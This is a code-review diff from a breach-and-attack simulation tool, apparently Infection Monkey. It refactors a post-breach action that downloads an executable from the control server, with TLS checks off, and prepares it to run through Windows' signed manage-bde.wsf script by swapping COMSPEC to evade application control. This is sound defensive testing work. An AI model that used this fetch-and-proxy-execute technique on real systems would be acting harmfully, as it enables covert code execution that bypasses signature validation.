CR changes

monkey/common/data/api_url_consts.py

@@ -0,0 +1 @@
+T1216_PBA_FILE_DOWNLOAD_PATH = '/api/t1216-pba/download'

monkey/infection_monkey/control.py

@@ -2,12 +2,14 @@ import json
 import logging
 import platform
 from socket import gethostname
+from urllib.parse import urljoin
 
 import requests
 from requests.exceptions import ConnectionError
 
 import infection_monkey.monkeyfs as monkeyfs
 import infection_monkey.tunnel as tunnel
+from common.data.api_url_consts import T1216_PBA_FILE_DOWNLOAD_PATH
 from infection_monkey.config import GUID, WormConfiguration
 from infection_monkey.network.info import check_internet_access, local_ips
 from infection_monkey.transport.http import HTTPConnectProxy
@@ -328,7 +330,8 @@ class ControlClient(object):
     @staticmethod
     def get_T1216_pba_file():
         try:
-            return requests.get("https://%s/api/t1216-pba/download/" % WormConfiguration.current_server,  # noqa: DUO123
+            return requests.get(urljoin(f"https://{WormConfiguration.current_server}/",  # noqa: DUO123
+                                        T1216_PBA_FILE_DOWNLOAD_PATH),
                                 verify=False,
                                 proxies=ControlClient.proxies,
                                 stream=True)

monkey/infection_monkey/post_breach/actions/use_signed_scripts.py

@@ -1,3 +1,4 @@
+import logging
 import subprocess
 
 from common.data.post_breach_consts import POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC
@@ -6,6 +7,8 @@ from infection_monkey.post_breach.signed_script_proxy.signed_script_proxy import
     cleanup_changes, get_commands_to_proxy_execution_using_signed_script)
 from infection_monkey.utils.environment import is_windows_os
 
+LOG = logging.getLogger(__name__)
+
 
 class SignedScriptProxyExecution(PBA):
     def __init__(self):
@@ -14,11 +17,14 @@ class SignedScriptProxyExecution(PBA):
                          windows_cmd=' '.join(windows_cmds))
 
     def run(self):
+        try:
             original_comspec = ''
             if is_windows_os():
                 original_comspec =\
                     subprocess.check_output('if defined COMSPEC echo %COMSPEC%', shell=True).decode()  # noqa: DUO116
 
             super().run()
-
+        except Exception as e:
+            LOG.warning(f"An exception occurred on running PBA {POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC}: {str(e)}")
+        finally:
             cleanup_changes(original_comspec)

monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py

@@ -1,5 +1,4 @@
 import os
-import subprocess
 
 from infection_monkey.control import ControlClient
 
@@ -8,11 +7,11 @@ TEMP_COMSPEC = os.path.join(os.getcwd(), 'random_executable.exe')
 
 def get_windows_commands_to_proxy_execution_using_signed_script():
     download = ControlClient.get_T1216_pba_file()
-    with open(TEMP_COMSPEC, 'wb') as file_obj:
+    with open(TEMP_COMSPEC, 'wb') as random_exe_obj:
-        file_obj.write(download.content)
+        random_exe_obj.write(download.content)
-        file_obj.flush()
+        random_exe_obj.flush()
 
-    windir_path = subprocess.check_output('echo %WINDIR%', shell=True).decode().strip('\r\n')  # noqa: DUO116
+    windir_path = os.environ['WINDIR']
     signed_script = os.path.join(windir_path, 'System32', 'manage-bde.wsf')
 
     return [

monkey/monkey_island/cc/app.py

@@ -6,6 +6,7 @@ from flask import Flask, Response, send_from_directory
 from werkzeug.exceptions import NotFound
 
 import monkey_island.cc.environment.environment_singleton as env_singleton
+from common.data.api_url_consts import T1216_PBA_FILE_DOWNLOAD_PATH
 from monkey_island.cc.consts import MONKEY_ISLAND_ABS_PATH
 from monkey_island.cc.database import database, mongo
 from monkey_island.cc.resources.attack.attack_config import AttackConfiguration
@@ -132,7 +133,7 @@ def init_api_resources(api):
     api.add_resource(Log, '/api/log', '/api/log/')
     api.add_resource(IslandLog, '/api/log/island/download', '/api/log/island/download/')
     api.add_resource(PBAFileDownload, '/api/pba/download/<string:path>')
-    api.add_resource(T1216PBAFileDownload, '/api/t1216-pba/download/')
+    api.add_resource(T1216PBAFileDownload, T1216_PBA_FILE_DOWNLOAD_PATH)
     api.add_resource(FileUpload, '/api/fileUpload/<string:file_type>',
                      '/api/fileUpload/<string:file_type>?load=<string:filename>',
                      '/api/fileUpload/<string:file_type>?restore=<string:filename>')

monkey/monkey_island/cc/services/attack/technique_reports/T1216.py

@@ -8,8 +8,14 @@ __author__ = "shreyamalviya"
 class T1216(PostBreachTechnique):
     tech_id = "T1216"
     unscanned_msg = "Monkey didn't attempt to execute an arbitrary program with the help of a " +\
-                    "pre-existing signed script since it didn't run on any Windows machines."
+                    "pre-existing signed script since it didn't run on any Windows machines. " +\
+                    "If successful, this behavior could be abused by adversaries to execute malicious files that could " +\
+                    "bypass application control and signature validation on systems."
     scanned_msg = "Monkey attempted to execute an arbitrary program with the help of a " +\
-                  "pre-existing signed script on Windows but failed."
+                  "pre-existing signed script on Windows but failed. " +\
-    used_msg = "Monkey executed an arbitrary program with the help of a pre-existing signed script on Windows."
+                  "If successful, this behavior could be abused by adversaries to execute malicious files that could " +\
+                  "bypass application control and signature validation on systems."
+    used_msg = "Monkey executed an arbitrary program with the help of a pre-existing signed script on Windows. " +\
+               "This behavior could be abused by adversaries to execute malicious files that could " +\
+               "bypass application control and signature validation on systems."
     pba_names = [POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC]